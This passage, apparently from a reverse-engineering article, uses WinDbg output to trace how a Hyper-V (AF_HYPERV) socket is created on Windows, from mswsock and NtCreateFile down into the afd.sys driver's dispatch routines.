<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dt _TOKEN_INFORMATION_CLASS @esp+8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">combase!_TOKEN_INFORMATION_CLASS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1d ( TokenIsAppContainer ) – probably it adaptation of sockets in the environment of the containers Docker or application will be compiled with /APPCONTAINER Visual studio key</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">then the result is stored in the variable mswsock!SockIsAppContainter, next we see initialization of </span><a href="about:blank" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">\\Device\\Afd\\Endpoint</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> string</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">which is transferred to ntdll! NtCreateFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dtx OBJECT_ATTRIBUTES poi(@esp+0x8) (3rd parameter ntdll!NtCreateFile)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(*((OBJECT_ATTRIBUTES *)0xf6f348)) [Type: OBJECT_ATTRIBUTES]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x000] Length : 0x18 [Type: unsigned long]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x004] RootDirectory : 0x0 [Type: void *]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x008] ObjectName : 0xf6f33c : "\Device\Afd\Endpoint" [Type: _UNICODE_STRING *]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x00c] Attributes : 0x42 [Type: unsigned long]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x010] SecurityDescriptor : 0x0 [Type: void *]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x014] SecurityQualityOfService : 0x0 [Type: void *]</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dtx _IO_STATUS_BLOCK @esp+0xc -r (the 4th parameter of ntdll!NtCreateFile) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(*((_IO_STATUS_BLOCK *)0xf6f30c)) [Type: _IO_STATUS_BLOCK] – not initialized structure</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x000] Status : 16184168 [Type: long]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x000] Pointer : </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0xf6f368</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [Type: void *]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x004] Information : 0x0 [Type: unsigned long] – after execution will be returned the status of operation (FILE_CREATED, FILE_OPENED, FILE_OVERWRITTEN, FILE_SUPERSEDED, FILE_EXISTS, FILE_DOES_NOT_EXIST)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further execution passes into a kernel to the afd.sys driver. At initialization this driver registers next handlers of IRP:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!drvobj afd 2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Driver object (ffffda8527de19c0) is for:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> \Driver\AFD</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DriverEntry: fffff803db38a000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!GsDriverEntry</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DriverStartIo: 00000000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DriverUnload: fffff803db34c380</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdUnload</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AddDevice: 00000000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Dispatch routines:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[00] IRP_MJ_CREATE fffff803db357e90</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[01] IRP_MJ_CREATE_NAMED_PIPE fffff803db357e90</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[02] IRP_MJ_CLOSE fffff803db357e90</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">[03] IRP_MJ_READ</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> fffff803db357e90</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[04] IRP_MJ_WRITE fffff803db357e90</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdDispatch</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kn</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Child-SP RetAddr Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 afd!AfdDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 nt!IopParseDevice+0x1655</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 nt!ObpLookupObjectName+0x8b2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 nt!ObOpenObjectByNameEx+0x1dd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 nt!IopCreateFile+0x3d9</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 nt!NtCreateFile+0x79</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 nt!KiSystemServiceCopyEnd+0x13</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ntdll!NtCreateFile</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x14</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Respectively after call ntdll!NtCreateFile from our program we will go to Afd!AfdDispatch. First parameter of it:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!devobj @rcx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Device object (ffffda8527de29d0) is for:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Afd \Driver\AFD DriverObject ffffda8527de19c0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Current Irp 00000000 RefCount 79 Type 00000011 Flags 00000050</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Dacl ffffcb8a7e8ccd11 DevExt 00000000 DevObjExt ffffda8527de2b20 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ExtensionFlags (0x00000800) DOE_DEFAULT_SD_PRESENT</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Characteristics (0x00020000) FILE_DEVICE_ALLOW_APPCONTAINER_TRAVERSAL</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Device queue is not busy.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!devstack ffffda8527de29d0 – in a stack only one device</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> !DevObj !DrvObj !DevExt ObjectName</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">> ffffda8527de29d0 \Driver\AFD 00000000 Afd</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Second parameter of Afd!AfdDispatch is IRP</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!irp @rdx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Irp is active with 4 stacks 4 is current (= 0xffffda8529720378)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">No Mdl: System buffer=ffffda8527088910: Thread </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ffffda8528714080</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">: Irp stack trace. </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cmd flg cl Device File Completion-Context</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">>[IRP_MJ_CREATE(0), N/A(0)]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0 0 ffffda8527de29d0 ffffda8528bc3550 00000000-00000000 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">\Driver\AFD</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Args: ffff908026e7b5d0 03000020 00030000 00000039</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can be convinced that the package is sent by our application</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!thread ffffda8528714080</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">THREAD ffffda8528714080 Cid 0f74.0ca8 Teb: 0000000000ddf000 Win32Thread: ffffda85272b94e0 RUNNING on processor 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">IRP List:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85297201d0: (0006,0310) Flags: 00000884 Mdl: 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Not impersonating</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DeviceMap ffffca89863843b0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Owning Process ffffda8527121080 Image: </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ServerExample.exe</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Attached Process N/A Image: N/A</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Wait Start TickCount 416475 Ticks: 1 (0:00:00:00.015)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Context Switch Count 3006 IdealProcessor: 0</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further Afd!AfdCreate is caused. The first parameter - the same IRP. Next - Afd!AfdCheckTDIFilter.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>r – параметры Afd!AfdCheckTDIFilter</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rdx=0000000000000022 (Address Family - AF_HYPERV)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r8=0000000000000001 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r9=0000000000000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It make the search addresses family AF_HYPERV, which was passed this function as parameter, in structure AfdTdiMapping (6 elements, the size of an element 20h of bytes). The structure contains references to standard network Windows devices.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<a href="about:blank" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">\\Device\\Tcp</span></a></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
